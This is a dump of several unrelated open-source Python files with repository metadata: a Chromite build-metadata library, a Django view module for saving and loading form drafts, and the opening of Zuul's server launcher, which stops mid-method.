"name": "MATLAB",
"bytes": "696786"
},
{
"name": "Makefile",
"bytes": "257"
},
{
"name": "Python",
"bytes": "966118"
},
{
"name": "TeX",
"bytes": "7449"
}
],
"symlink_target": ""
} |
"""Module containing class for recording metadata about a run."""
import collections
import datetime
import json
import logging
import math
import multiprocessing
import os
import re
import time
from chromite.cbuildbot import archive_lib
from chromite.cbuildbot import cbuildbot_config
from chromite.cbuildbot import results_lib
from chromite.cbuildbot import constants
from chromite.lib import cros_build_lib
from chromite.lib import gs
from chromite.lib import parallel
# Number of parallel processes used when uploading/downloading GS files.
MAX_PARALLEL = 40
ARCHIVE_ROOT = 'gs://chromeos-image-archive/%(target)s'
# NOTE: gsutil 3.42 has a bug where '/' is ignored in this context unless it
# is listed twice. So we list it twice here for now.
METADATA_URL_GLOB = os.path.join(ARCHIVE_ROOT,
'R%(milestone)s**//metadata.json')
LATEST_URL = os.path.join(ARCHIVE_ROOT, 'LATEST-master')
class LocalBuilderStatus(object):
  """Parses the local cbuildbot results into pass/fail statuses."""
  def __init__(self, general_status, board_status_map):
    """Initialize a LocalBuilderStatus object.

    Args:
      general_status: Status of the general (non board-specific) steps;
        FINAL_STATUS_FAILED when any general step failed.
      board_status_map: Dict mapping board name to the status of that
        board's board-specific steps.
    """
    self.general_status = general_status
    self.board_status_map = board_status_map
  @classmethod
  def Get(cls):
    """Build a LocalBuilderStatus from the current results_lib results."""
    overall = constants.FINAL_STATUS_PASSED
    per_board = {}
    for entry in results_lib.Results.Get():
      ok = entry.result in results_lib.Results.NON_FAILURE_TYPES
      board = entry.board
      if not board:
        # General step: a single failure poisons the overall status.
        if not ok:
          overall = constants.FINAL_STATUS_FAILED
      elif ok:
        # Record a pass only if the board has no recorded failure yet.
        per_board.setdefault(board, constants.FINAL_STATUS_PASSED)
      else:
        # A failure always overwrites any earlier pass for this board.
        per_board[board] = constants.FINAL_STATUS_FAILED
    return cls(overall, per_board)
  def GetBuilderStatus(self, config_name):
    """Return the final pass/fail status for builder |config_name|.

    The builder passes only when all general steps passed and every one of
    its boards has a recorded pass; a board missing from the map counts as
    failed (e.g. the builder aborted before reaching it).
    """
    if self.general_status == constants.FINAL_STATUS_FAILED:
      return constants.FINAL_STATUS_FAILED
    for board in cbuildbot_config.config[config_name].boards:
      if (self.board_status_map.get(board, constants.FINAL_STATUS_FAILED) ==
          constants.FINAL_STATUS_FAILED):
        return constants.FINAL_STATUS_FAILED
    return constants.FINAL_STATUS_PASSED
class CBuildbotMetadata(object):
  """Class for recording metadata about a run."""

  def __init__(self, metadata_dict=None, multiprocess_manager=None):
    """Constructor for CBuildbotMetadata.

    Args:
      metadata_dict: Optional dictionary containing initial metadata,
                     as returned by loading metadata from json.
      multiprocess_manager: Optional multiprocess.Manager instance. If
                            supplied, the metadata instance will use
                            multiprocess containers so that its state
                            is correctly synced across processes.
    """
    super(CBuildbotMetadata, self).__init__()
    if multiprocess_manager:
      # Manager proxies keep the state visible to all processes that share
      # this manager.
      self._metadata_dict = multiprocess_manager.dict()
      self._cl_action_list = multiprocess_manager.list()
    else:
      self._metadata_dict = {}
      self._cl_action_list = []
    if metadata_dict:
      self.UpdateWithDict(metadata_dict)

  def UpdateWithDict(self, metadata_dict):
    """Update metadata dictionary with values supplied in |metadata_dict|.

    This method is effectively the inverse of GetDict. Existing key-values
    in metadata will be overwritten by those supplied in |metadata_dict|,
    with the exception of the cl_actions list which will be extended with
    the contents (if any) of the supplied dict's cl_actions list.

    Args:
      metadata_dict: A dictionary of key-value pairs to be added to this
                     metadata instance. Keys should be strings, values
                     should be json-able.

    Returns:
      self
    """
    # This is effectively the inverse of the dictionary construction in
    # GetDict, to reconstruct the correct internal representation of a
    # metadata object: cl_actions is kept in its own list, everything else
    # in the dict.
    metadata_dict = metadata_dict.copy()
    cl_action_list = metadata_dict.pop('cl_actions', None)
    self._metadata_dict.update(metadata_dict)
    if cl_action_list:
      self._cl_action_list.extend(cl_action_list)
    return self

  def UpdateKeyDictWithDict(self, key, key_metadata_dict):
    """Update metadata for |key| with values supplied in |key_metadata_dict|.

    This method merges the dictionary for the given key with the given key
    metadata dictionary (allowing them to be effectively updated from any
    stage). This may not be multiprocess safe if two processes attempt to
    modify a dictionary with the same key.

    Args:
      key: The key name (e.g. 'version' or 'status')
      key_metadata_dict: A dictionary of key-value pairs to be added to this
                         metadata key. Keys should be strings, values
                         should be json-able.

    Returns:
      self
    """
    # If the key already exists, then use its dictionary.  The merged dict is
    # assigned back (rather than mutated in place), presumably so the update
    # also takes effect when _metadata_dict is a multiprocessing proxy --
    # confirm before simplifying.
    metadata_dict = self._metadata_dict.copy()
    update_dict = metadata_dict.pop(key, {})
    update_dict.update(key_metadata_dict)
    self._metadata_dict[key] = update_dict
    return self

  def GetDict(self):
    """Returns a dictionary representation of metadata."""
    # CL actions are stored in self._cl_action_list instead of
    # in self._metadata_dict['cl_actions'], because _cl_action_list
    # is potentially a multiprocessing list proxy. So, _cl_action_list needs
    # to be copied into a normal list.
    temp = self._metadata_dict.copy()
    temp['cl_actions'] = list(self._cl_action_list)
    return temp

  def GetJSON(self):
    """Return a JSON string representation of metadata."""
    return json.dumps(self.GetDict())

  def RecordCLAction(self, change, action, timestamp=None, reason=''):
    """Record an action that was taken on a CL, to the metadata.

    Args:
      change: A GerritPatch object for the change acted on.
      action: The action taken, should be one of constants.CL_ACTIONS
      timestamp: An integer timestamp such as int(time.time()) at which
                 the action was taken. Default: Now.
      reason: Description of the reason the action was taken. Default: ''

    Returns:
      self
    """
    cl_action = (self._ChangeAsSmallDictionary(change),
                 action,
                 timestamp or int(time.time()),
                 reason or '')
    self._cl_action_list.append(cl_action)
    return self

  @staticmethod
  def _ChangeAsSmallDictionary(change):
    """Returns a small dictionary representation of a gerrit change.

    Args:
      change: A GerritPatch or GerritPatchTuple object.

    Returns:
      A dictionary of the form {'gerrit_number': change.gerrit_number,
                                'patch_number': change.patch_number,
                                'internal': change.internal}
    """
    return {'gerrit_number': change.gerrit_number,
            'patch_number': change.patch_number,
            'internal': change.internal}

  @staticmethod
  def GetReportMetadataDict(builder_run, get_changes_from_pool,
                            get_statuses_from_slaves, config=None, stage=None,
                            final_status=None, sync_instance=None,
                            completion_instance=None):
    """Return a metadata dictionary summarizing a build.

    This method replaces code that used to exist in the ArchivingStageMixin
    class from cbuildbot_stage. It contains all the Report-stage-time
    metadata construction logic. The logic here is intended to be gradually
    refactored out so that the metadata is constructed gradually by the
    stages that are responsible for pieces of data, as they run.

    Args:
      builder_run: BuilderRun instance for this run.
      get_changes_from_pool: If True, information about patches in the
                             sync_instance.pool will be recorded.
      get_statuses_from_slaves: If True, status information of slave
                                builders will be recorded.
      config: The build config for this run. Defaults to builder_run.config.
      stage: The stage name that this metadata file is being uploaded for.
      final_status: Whether the build passed or failed. If None, the build
                    will be treated as still running.
      sync_instance: The stage instance that was used for syncing the source
                     code. This should be a derivative of SyncStage. If None,
                     the list of commit queue patches will not be included
                     in the metadata.
      completion_instance: The stage instance that was used to wait for slave
                           completion. Used to add slave build information to
                           master builder's metadata. If None, no such status
                           information will be included. If not None, this
                           should be a derivative of
                           MasterSlaveSyncCompletionStage.

    Returns:
      A metadata dictionary suitable to be json-serialized.
    """
    config = config or builder_run.config
    start_time = results_lib.Results.start_time
    current_time = datetime.datetime.now()
    start_time_stamp = cros_build_lib.UserDateTimeFormat(timeval=start_time)
    current_time_stamp = cros_build_lib.UserDateTimeFormat(timeval=current_time)
    duration = '%s' % (current_time - start_time,)

    metadata = {
        'status': {
            'current-time': current_time_stamp,
            # 'running' until a final status is known.
            'status': final_status if final_status else 'running',
            'summary': stage or '',
        },
        'time': {
            'start': start_time_stamp,
            # 'finish' stays empty while the build is still running.
            'finish': current_time_stamp if final_status else '',
            'duration': duration,
        }
    }

    # One entry per recorded step, with its status, duration and log URL.
    metadata['results'] = []
    for entry in results_lib.Results.Get():
      timestr = datetime.timedelta(seconds=math.ceil(entry.time))
      if entry.result in results_lib.Results.NON_FAILURE_TYPES:
        status = constants.FINAL_STATUS_PASSED
      else:
        status = constants.FINAL_STATUS_FAILED
      metadata['results'].append({
          'name': entry.name,
          'status': status,
          # The result might be a custom exception.
          'summary': str(entry.result),
          'duration': '%s' % timestr,
          'board': entry.board,
          'description': entry.description,
          'log': builder_run.ConstructDashboardURL(stage=entry.name),
      })

    if get_changes_from_pool:
      changes = []
      pool = sync_instance.pool
      for change in pool.changes:
        details = {'gerrit_number': change.gerrit_number,
                   'patch_number': change.patch_number,
                   'internal': change.internal}
        # Record pass/fail counts both for the latest patchset only and
        # (with a 'total_' prefix) across all patchsets.
        for latest_patchset_only in (False, True):
          prefix = '' if latest_patchset_only else 'total_'
          for status in (pool.STATUS_FAILED, pool.STATUS_PASSED):
            count = pool.GetCLStatusCount(pool.bot, change, status,
                                          latest_patchset_only)
            details['%s%s' % (prefix, status.lower())] = count
        changes.append(details)
      metadata['changes'] = changes

    # If we were a CQ master, then include a summary of the status of slave cq
    # builders in metadata.
    if get_statuses_from_slaves:
      statuses = completion_instance.GetSlaveStatuses()
      if not statuses:
        logging.warning('completion_instance did not have any statuses '
                        'to report. Will not add slave status to metadata.')
      metadata['slave_targets'] = {}
      for builder, status in statuses.iteritems():
        metadata['slave_targets'][builder] = status.AsFlatDict()
    return metadata
# The graphite graphs use seconds since epoch start as time value.
EPOCH_START = datetime.datetime(1970, 1, 1)

# Formats we like for output.
NICE_DATE_FORMAT = '%Y/%m/%d'
NICE_TIME_FORMAT = '%H:%M:%S'
NICE_DATETIME_FORMAT = NICE_DATE_FORMAT + ' ' + NICE_TIME_FORMAT

# TODO(akeshet): Merge this class into CBuildbotMetadata.
class BuildData(object):
  """Class for examining metadata from a prior run.

  The raw metadata dict can be accessed at self.metadata_dict or via []
  and get() on a BuildData object. Some values from metadata_dict are
  also surfaced through the following list of supported properties:

  build_number
  stages
  slaves
  chromeos_version
  chrome_version
  bot_id
  status
  start_datetime
  finish_datetime
  start_date_str
  start_time_str
  start_datetime_str
  finish_date_str
  finish_time_str
  finish_datetime_str
  runtime_seconds
  runtime_minutes
  epoch_time_seconds
  count_changes
  run_date
  failure_message
  """

  __slots__ = (
      'gathered_dict',  # Dict with gathered data (sheets/carbon version).
      'gathered_url',   # URL to metadata.json.gathered location in GS.
      'metadata_dict',  # Dict representing metadata data from JSON.
      'metadata_url',   # URL to metadata.json location in GS.
  )

  # Regexp for parsing datetimes as stored in metadata.json. Example text:
  # Fri, 14 Feb 2014 17:00:49 -0800 (PST)
  DATETIME_RE = re.compile(r'^(.+)\s-\d\d\d\d\s\(P\wT\)$')

  # Keys in the side-car '.gathered' file recording which stats versions
  # have already processed this build.
  SHEETS_VER_KEY = 'sheets_version'
  CARBON_VER_KEY = 'carbon_version'

  @staticmethod
  def ReadMetadataURLs(urls, gs_ctx=None, exclude_running=True,
                       get_sheets_version=False):
    """Read a list of metadata.json URLs and return BuildData objects.

    Args:
      urls: List of metadata.json GS URLs.
      gs_ctx: A GSContext object to use. If not provided gs.GSContext will
        be called to get a GSContext to use.
      exclude_running: If True the metadata for builds that are still running
        will be skipped.
      get_sheets_version: Whether to try to figure out the last sheets version
        and the last carbon version that was gathered. This requires an extra
        gsutil request and is only needed if you are writing the metadata to
        the Google Sheets spreadsheet.

    Returns:
      List of BuildData objects, in the same order as |urls|.
    """
    gs_ctx = gs_ctx or gs.GSContext()
    cros_build_lib.Info('Reading %d metadata URLs using %d processes now.',
                        len(urls), MAX_PARALLEL)

    def _ReadMetadataURL(url):
      # Read the metadata.json URL and parse json into a dict.
      metadata_dict = json.loads(gs_ctx.Cat(url, print_cmd=False).output)

      # Read the file next to url which indicates whether the metadata has
      # been gathered before, and with what stats version.
      if get_sheets_version:
        gathered_dict = {}
        gathered_url = url + '.gathered'
        if gs_ctx.Exists(gathered_url, print_cmd=False):
          gathered_dict = json.loads(gs_ctx.Cat(gathered_url,
                                                print_cmd=False).output)
        sheets_version = gathered_dict.get(BuildData.SHEETS_VER_KEY)
        carbon_version = gathered_dict.get(BuildData.CARBON_VER_KEY)
      else:
        sheets_version, carbon_version = None, None

      bd = BuildData(url, metadata_dict, sheets_version=sheets_version,
                     carbon_version=carbon_version)

      if bd.build_number is None:
        cros_build_lib.Warning('Metadata at %s was missing build number.',
                               url)
        # metadata.json can be missing a build number if the build died before
        # ReportBuildStartStage. See crbug.com/369748. As a workaround so that
        # gather_builder_stats can still record these builds in the spreadsheet
        # try to infer the build number from the file's url.
        m = re.match(r'.*-b([0-9]*)/.*', url)
        if m:
          inferred_number = int(m.groups()[0])
          cros_build_lib.Warning('Inferred build number %d from metadata url.',
                                 inferred_number)
          bd.metadata_dict['build-number'] = inferred_number
      if not (sheets_version is None and carbon_version is None):
        # NOTE(review): if exactly one of the versions is None the %d
        # formatting below will raise; presumed not to occur in practice.
        cros_build_lib.Debug('Read %s:\n'
                             '  build_number=%d, sheets v%d, carbon v%d', url,
                             bd.build_number, sheets_version, carbon_version)
      else:
        cros_build_lib.Debug('Read %s:\n  build_number=%d, ungathered',
                             url, bd.build_number)

      build_data_per_url[url] = bd

    with multiprocessing.Manager() as manager:
      # A managed dict lets the worker processes hand BuildData objects back.
      # The closure above picks this binding up via late binding.
      build_data_per_url = manager.dict()
      parallel.RunTasksInProcessPool(_ReadMetadataURL, [[url] for url in urls],
                                     processes=MAX_PARALLEL)
      builds = [build_data_per_url[url] for url in urls]

    if exclude_running:
      builds = [b for b in builds if b.status != 'running']
    return builds

  @staticmethod
  def MarkBuildsGathered(builds, sheets_version, carbon_version, gs_ctx=None):
    """Mark specified |builds| as processed for the given stats versions.

    Args:
      builds: List of BuildData objects.
      sheets_version: The Google Sheets version these builds are now processed
        for.
      carbon_version: The Carbon/Graphite version these builds are now
        processed for.
      gs_ctx: A GSContext object to use, if set.
    """
    gs_ctx = gs_ctx or gs.GSContext()

    # Filter for builds that were not already on these versions.
    builds = [b for b in builds
              if b.sheets_version != sheets_version or
              b.carbon_version != carbon_version]
    if builds:
      log_ver_str = 'Sheets v%d, Carbon v%d' % (sheets_version, carbon_version)
      cros_build_lib.Info('Marking %d builds gathered (for %s) using %d'
                          ' processes now.', len(builds), log_ver_str,
                          MAX_PARALLEL)

      def _MarkGathered(build):
        # Update local gathered state, then write it next to metadata.json.
        build.MarkGathered(sheets_version, carbon_version)
        json_text = json.dumps(build.gathered_dict.copy())
        gs_ctx.Copy('-', build.gathered_url, input=json_text, print_cmd=False)
        cros_build_lib.Debug('Marked build_number %d processed for %s.',
                             build.build_number, log_ver_str)

      inputs = [[build] for build in builds]
      parallel.RunTasksInProcessPool(_MarkGathered, inputs,
                                     processes=MAX_PARALLEL)

  def __init__(self, metadata_url, metadata_dict, carbon_version=None,
               sheets_version=None):
    """Initialize a BuildData from an already-loaded metadata dict.

    Args:
      metadata_url: GS URL the metadata was read from.
      metadata_dict: Parsed contents of metadata.json.
      carbon_version: Last Carbon/Graphite stats version gathered, if known.
      sheets_version: Last Google Sheets stats version gathered, if known.
    """
    self.metadata_url = metadata_url
    self.metadata_dict = metadata_dict

    # If a stats version is not specified default to -1 so that the initial
    # version (version 0) will be considered "newer".
    self.gathered_url = metadata_url + '.gathered'
    self.gathered_dict = {
        self.CARBON_VER_KEY: -1 if carbon_version is None else carbon_version,
        self.SHEETS_VER_KEY: -1 if sheets_version is None else sheets_version,
    }

  def MarkGathered(self, sheets_version, carbon_version):
    """Mark this build as processed for the given stats versions."""
    self.gathered_dict[self.SHEETS_VER_KEY] = sheets_version
    self.gathered_dict[self.CARBON_VER_KEY] = carbon_version

  def __getitem__(self, key):
    """Relay dict-like access to self.metadata_dict."""
    return self.metadata_dict[key]

  def get(self, key, default=None):
    """Relay dict-like access to self.metadata_dict."""
    return self.metadata_dict.get(key, default)

  @property
  def sheets_version(self):
    """Last Google Sheets stats version gathered for this build (-1 if none)."""
    return self.gathered_dict[self.SHEETS_VER_KEY]

  @property
  def carbon_version(self):
    """Last Carbon/Graphite stats version gathered for this build (-1 if none)."""
    return self.gathered_dict[self.CARBON_VER_KEY]

  @property
  def build_number(self):
    """Build number as an int, or None if not recorded in the metadata."""
    try:
      return int(self['build-number'])
    except KeyError:
      return None

  @property
  def stages(self):
    """List of per-stage result dicts (the 'results' metadata entry)."""
    return self['results']

  @property
  def slaves(self):
    """Dict of slave builder statuses; empty for non-master/older metadata."""
    return self.get('slave_targets', {})

  @property
  def chromeos_version(self):
    """Full ChromeOS version string, or None if not recorded."""
    try:
      return self['version']['full']
    except KeyError:
      return None

  @property
  def chrome_version(self):
    """Chrome version string, or None if not recorded."""
    try:
      return self['version']['chrome']
    except KeyError:
      return None

  @property
  def bot_id(self):
    """The build config name this metadata was produced by."""
    return self['bot-config']

  @property
  def status(self):
    """Final status string (e.g. 'passed', 'failed', 'running'), or None."""
    return self.get('status', {}).get('status', None)

  @classmethod
  def _ToDatetime(cls, time_str):
    """Parse a metadata timestamp string into a naive datetime.

    Raises:
      ValueError: If |time_str| does not match the expected format.
    """
    match = cls.DATETIME_RE.search(time_str)
    if match:
      # The timezone offset and (P?T) suffix are matched away by the regexp;
      # the resulting datetime is naive, in the build's local time.
      return datetime.datetime.strptime(match.group(1), '%a, %d %b %Y %H:%M:%S')
    else:
      raise ValueError('Unexpected metadata datetime format: %s' % time_str)

  @property
  def start_datetime(self):
    return self._ToDatetime(self['time']['start'])

  @property
  def finish_datetime(self):
    return self._ToDatetime(self['time']['finish'])

  @property
  def start_date_str(self):
    return self.start_datetime.strftime(NICE_DATE_FORMAT)

  @property
  def start_time_str(self):
    return self.start_datetime.strftime(NICE_TIME_FORMAT)

  @property
  def start_datetime_str(self):
    return self.start_datetime.strftime(NICE_DATETIME_FORMAT)

  @property
  def finish_date_str(self):
    return self.finish_datetime.strftime(NICE_DATE_FORMAT)

  @property
  def finish_time_str(self):
    return self.finish_datetime.strftime(NICE_TIME_FORMAT)

  @property
  def finish_datetime_str(self):
    return self.finish_datetime.strftime(NICE_DATETIME_FORMAT)

  @property
  def failure_message(self):
    """Human-readable summary of failed slaves, deduplicated by reason."""
    mapping = {}
    # Dedup the messages from the slaves.
    for slave in self.GetFailedSlaves():
      message = self.slaves[slave]['reason']
      mapping[message] = mapping.get(message, []) + [slave]

    message_list = []
    for message, slaves in mapping.items():
      if len(slaves) >= 6:
        # Do not print all the names when there are more than 6 (an
        # arbitrary number) builders.
        message_list.append('%d builders: %s' % (len(slaves), message))
      else:
        message_list.append('%s: %s' % (','.join(slaves), message))

    return ' | '.join(message_list)

  def GetChangelistsStr(self):
    """Return a space-separated summary of this build's changes.

    Each change is rendered as 'gerrit_number:patch_number', with a
    leading '*' for internal changes.
    """
    cl_strs = []
    for cl_dict in self.metadata_dict['changes']:
      cl_strs.append('%s%s:%s' %
                     ('*' if cl_dict['internal'] == 'true' else '',
                      cl_dict['gerrit_number'], cl_dict['patch_number']))
    return ' '.join(cl_strs)

  def GetFailedStages(self, with_urls=False):
    """Get names of all failed stages, optionally with URLs for each.

    Args:
      with_urls: If True then also return URLs. See Returns.

    Returns:
      If with_urls is False, return list of stage names. Otherwise, return list
      of tuples (stage name, stage URL).
    """
    def _Failed(stage):
      # This can be more discerning in the future, such as for optional stages.
      return stage['status'] == 'failed'

    if with_urls:
      # The "log" url includes "/logs/stdio" on the end. Strip that off.
      return [(s['name'], os.path.dirname(os.path.dirname(s['log'])))
              for s in self.stages if _Failed(s)]
    else:
      return [s['name'] for s in self.stages if _Failed(s)]

  def GetFailedSlaves(self, with_urls=False):
    """Get names of all failed slave builders, optionally with dashboard URLs.

    Args:
      with_urls: If True, return (name, dashboard_url) tuples instead.

    Returns:
      List of slave names, or of (name, dashboard_url) tuples if with_urls.
    """
    def _Failed(slave):
      return slave['status'] == 'fail'

    # Older metadata has no slave_targets entry; self.slaves defaults to {}.
    slaves = self.slaves
    if with_urls:
      return [(name, slave['dashboard_url'])
              for name, slave in slaves.items() if _Failed(slave)]
    else:
      return [name for name, slave in slaves.items() if _Failed(slave)]

  @property
  def runtime_seconds(self):
    # NOTE(review): .seconds discards whole days of the timedelta; a run
    # longer than 24 hours would be under-reported. Presumed not to occur.
    return (self.finish_datetime - self.start_datetime).seconds

  @property
  def runtime_minutes(self):
    return self.runtime_seconds / 60

  @property
  def epoch_time_seconds(self):
    # End time seconds since 1/1/1970, for some reason.
    return int((self.finish_datetime - EPOCH_START).total_seconds())

  @property
  def patches(self):
    """List of GerritPatchTuple for all changes recorded in this build."""
    return [GerritPatchTuple(gerrit_number=change['gerrit_number'],
                             patch_number=change['patch_number'],
                             internal=change['internal'])
            for change in self.metadata_dict.get('changes', [])]

  @property
  def count_changes(self):
    """Number of changes recorded for this build (0 if none)."""
    if not self.metadata_dict.get('changes', None):
      return 0
    return len(self.metadata_dict['changes'])

  @property
  def run_date(self):
    """Finish date formatted as 'DD.MM.YYYY'."""
    return self.finish_datetime.strftime('%d.%m.%Y')

  def Passed(self):
    """Return True if this represents a successful run."""
    return 'passed' == self.metadata_dict['status']['status'].strip()
def FindLatestFullVersion(builder, version):
  """Find the latest full version number built by |builder| on |version|.

  Args:
    builder: Builder to load information from. E.g. daisy-release
    version: Version that we are interested in. E.g. 5602.0.0

  Returns:
    The latest corresponding full version number, including milestone prefix,
    e.g. R35-5602.0.0 (possibly with a -rcN or -bNNNN suffix for some
    builders), or None if no LATEST file exists for this version.
  """
  ctx = gs.GSContext()
  builder_config = cbuildbot_config.config[builder]
  latest_url = os.path.join(archive_lib.GetBaseUploadURI(builder_config),
                            'LATEST-%s' % version)
  try:
    result = ctx.Cat(latest_url)
  except gs.GSNoSuchKey:
    return None
  return result.output.strip()
def GetBuildMetadata(builder, full_version):
  """Fetch the metadata.json object for |builder| and |full_version|.

  Args:
    builder: Builder to load information from. E.g. daisy-release
    full_version: Version that we are interested in, including milestone
      prefix. E.g. R35-5602.0.0. For some builders, this may also include a
      -rcN or -bNNNN suffix.

  Returns:
    A newly created CBuildbotMetadata object with the metadata from the given
    |builder| and |full_version|, or None if no metadata.json exists there.
  """
  ctx = gs.GSContext()
  builder_config = cbuildbot_config.config[builder]
  base_url = archive_lib.GetBaseUploadURI(builder_config)
  # os.path.join cannot raise GSNoSuchKey, so only the Cat is guarded.
  metadata_url = os.path.join(base_url, full_version, constants.METADATA_JSON)
  try:
    raw_json = ctx.Cat(metadata_url).output
  except gs.GSNoSuchKey:
    return None
  return CBuildbotMetadata(json.loads(raw_json))
class MetadataException(Exception):
  """Base exception class for exceptions in this module."""
class GetMilestoneError(MetadataException):
  """Raised when the latest milestone cannot be determined from GS."""
def GetLatestMilestone():
  """Get the latest milestone from CQ Master LATEST-master file.

  Returns:
    The latest milestone as an integer, e.g. 35.

  Raises:
    GetMilestoneError: If the LATEST file is missing or its content does
      not look like a version string.
  """
  # Use CQ Master target to get latest milestone.
  latest_url = LATEST_URL % {'target': constants.CQ_MASTER}
  gs_ctx = gs.GSContext()
  cros_build_lib.Info('Getting latest milestone from %s', latest_url)
  try:
    content = gs_ctx.Cat(latest_url).output.strip()
  except gs.GSNoSuchKey:
    raise GetMilestoneError('LATEST file missing: %s' % latest_url)
  # Expected syntax is like the following: "R35-1234.5.6-rc7".
  # An assert here would be stripped under `python -O`; raise explicitly.
  if not content.startswith('R'):
    raise GetMilestoneError('Unexpected LATEST content: %s' % content)
  milestone = content.split('-')[0][1:]
  cros_build_lib.Info('Latest milestone determined to be: %s', milestone)
  return int(milestone)
def GetMetadataURLsSince(target, start_date):
  """Get metadata.json URLs for |target| since |start_date|.

  The modified time of the GS files is used to compare with start_date, so
  the completion date of the builder run is what is important here.

  Args:
    target: Builder target name.
    start_date: datetime.date object.

  Returns:
    Metadata urls for runs found.
  """
  urls = []
  milestone = GetLatestMilestone()
  gs_ctx = gs.GSContext()
  while True:
    base_url = METADATA_URL_GLOB % {'target': target, 'milestone': milestone}
    cros_build_lib.Info('Getting %s builds for R%d from "%s"',
                        target, milestone, base_url)
    try:
      # Get GS URLs as tuples (url, size, modified datetime). We want the
      # datetimes to quickly know when we are done collecting URLs.
      url_details = gs_ctx.LSWithDetails(base_url)
    except gs.GSNoSuchKey:
      # We ran out of metadata to collect. Stop searching back in time.
      cros_build_lib.Info('No %s builds found for R%d. I will not continue'
                          ' search to older milestones.', target, milestone)
      break
    if not url_details:
      # An empty listing would make the oldest-entry check below raise;
      # treat it like a missing key and stop searching.
      break
    # Sort by modified timestamp, newest first.
    url_details = sorted(url_details, key=lambda x: x[2], reverse=True)
    # See if we have gone far enough back by checking datetime of oldest URL
    # in the current batch.
    if url_details[-1][2].date() < start_date:
      # We want a subset of these URLs, then we are done.
      urls.extend([url for (url, _size, dt) in url_details
                   if dt.date() >= start_date])
      break
    else:
      # Accept all these URLs, then continue on to the next milestone.
      urls.extend([url for (url, _size, _dt) in url_details])
      milestone -= 1
      cros_build_lib.Info('Continuing on to R%d.', milestone)
  return urls
# Lightweight identifier for one patchset of a gerrit change.
GerritPatchTuple = collections.namedtuple('GerritPatchTuple',
                                          'gerrit_number patch_number internal')
# Identifier for a gerrit change, without a patchset number.
GerritChangeTuple = collections.namedtuple('GerritChangeTuple',
                                           'gerrit_number internal')
# One CL action as recorded in metadata (see RecordCLAction).
CLActionTuple = collections.namedtuple('CLActionTuple',
                                       'change action timestamp reason')
# A CL action annotated with the bot type and build that performed it.
CLActionWithBuildTuple = collections.namedtuple('CLActionWithBuildTuple',
                                                'change action timestamp '
                                                'reason bot_type build')
| {
"content_hash": "b5c32bcfb469e0739db3a063e2c79a08",
"timestamp": "",
"source": "github",
"line_count": 836,
"max_line_length": 80,
"avg_line_length": 36.11722488038278,
"alnum_prop": 0.6469828442736968,
"repo_name": "chadversary/chromiumos.chromite",
"id": "cdeb6a0f47a60f8004d87bad444babaeab3aecd5",
"size": "30364",
"binary": false,
"copies": "1",
"ref": "refs/heads/fix-repo-mirror",
"path": "cbuildbot/metadata_lib.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "85"
},
{
"name": "Python",
"bytes": "3652882"
},
{
"name": "Shell",
"bytes": "24031"
}
],
"symlink_target": ""
} |
from django.shortcuts import get_object_or_404
from django.views.decorators.http import require_POST, require_GET
from django.http import HttpResponse, HttpResponseRedirect
from django.utils.translation import ugettext_lazy as _
from models import Draft
from django.contrib import messages
@require_POST
def save(request, path):
    """Store the POSTed form data as the draft for *path*, then redirect back."""
    draft = Draft.objects.get_or_create(path=path)[0]
    draft.serialized_data = request.POST.urlencode()
    draft.save()
    messages.add_message(request, messages.INFO, _(u'Draft saved'))
    return HttpResponseRedirect('/%s' % path)
@require_GET
def load(request, path):
    """Return the saved draft data for *path*, or an empty response if none."""
    try:
        serialized = Draft.objects.get(path=path).serialized_data
    except Draft.DoesNotExist:
        serialized = ''
    return HttpResponse(serialized)
@require_POST
def discard(request, path):
    """Delete the draft for *path*, flash a status message, redirect back."""
    try:
        draft = Draft.objects.get(path=path)
    except Draft.DoesNotExist:
        messages.add_message(
            request, messages.ERROR,
            _(u'There was no draft corresponding to this document.'))
    else:
        draft.delete()
        messages.add_message(request, messages.INFO, _(u'Draft deleted'))
    return HttpResponseRedirect('/%s' % path)
"content_hash": "e484dae089f86efe68f46cb50ff5cd33",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 111,
"avg_line_length": 35.9375,
"alnum_prop": 0.7217391304347827,
"repo_name": "platypus-creation/django-draft",
"id": "ad377d84a91f6f70a5269ef1dac4d7387273e5bc",
"size": "1150",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "draft/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "3720"
},
{
"name": "Python",
"bytes": "3899"
}
],
"symlink_target": ""
} |
import argparse
import ConfigParser
import daemon
import extras
# as of python-daemon 1.6 it doesn't bundle pidlockfile anymore
# instead it depends on lockfile-0.9.1 which uses pidfile.
pid_file_module = extras.try_imports(['daemon.pidlockfile', 'daemon.pidfile'])
import logging
import logging.config
import os
import sys
import signal
import traceback
# No zuul imports here because they pull in paramiko which must not be
# imported until after the daemonization.
# https://github.com/paramiko/paramiko/issues/59
# Similar situation with gear and statsd.
def stack_dump_handler(signum, frame):
    """SIGUSR2 handler: log a stack trace of every thread to zuul.stack_dump."""
    # Ignore SIGUSR2 while dumping so a second signal cannot re-enter us;
    # the handler is re-armed at the end.
    signal.signal(signal.SIGUSR2, signal.SIG_IGN)
    chunks = []
    for thread_id, stack_frame in sys._current_frames().items():
        chunks.append("Thread: %s\n" % thread_id)
        chunks.append("".join(traceback.format_stack(stack_frame)))
    logging.getLogger("zuul.stack_dump").debug("".join(chunks))
    signal.signal(signal.SIGUSR2, stack_dump_handler)


signal.signal(signal.SIGUSR2, stack_dump_handler)
class Server(object):
    """Top-level zuul server object.

    Owns command line parsing, configuration loading, signal handling and
    the lifetime of the scheduler and its helpers (launcher, triggers,
    reporters, webapp, RPC listener, and an optional forked gear server).
    """

    def __init__(self):
        self.args = None             # Parsed argparse namespace.
        self.config = None           # ConfigParser with zuul.conf contents.
        self.gear_server_pid = None  # PID of forked gear server child, if any.

    def parse_arguments(self):
        """Parse command line options into self.args."""
        parser = argparse.ArgumentParser(description='Project gating system.')
        parser.add_argument('-c', dest='config',
                            help='specify the config file')
        parser.add_argument('-l', dest='layout',
                            help='specify the layout file')
        parser.add_argument('-d', dest='nodaemon', action='store_true',
                            help='do not run as a daemon')
        parser.add_argument('-t', dest='validate', nargs='?', const=True,
                            metavar='JOB_LIST',
                            help='validate layout file syntax (optionally '
                            'providing the path to a file with a list of '
                            'available job names)')
        parser.add_argument('--version', dest='version', action='version',
                            version=self._get_version(),
                            help='show zuul version')
        self.args = parser.parse_args()

    def _get_version(self):
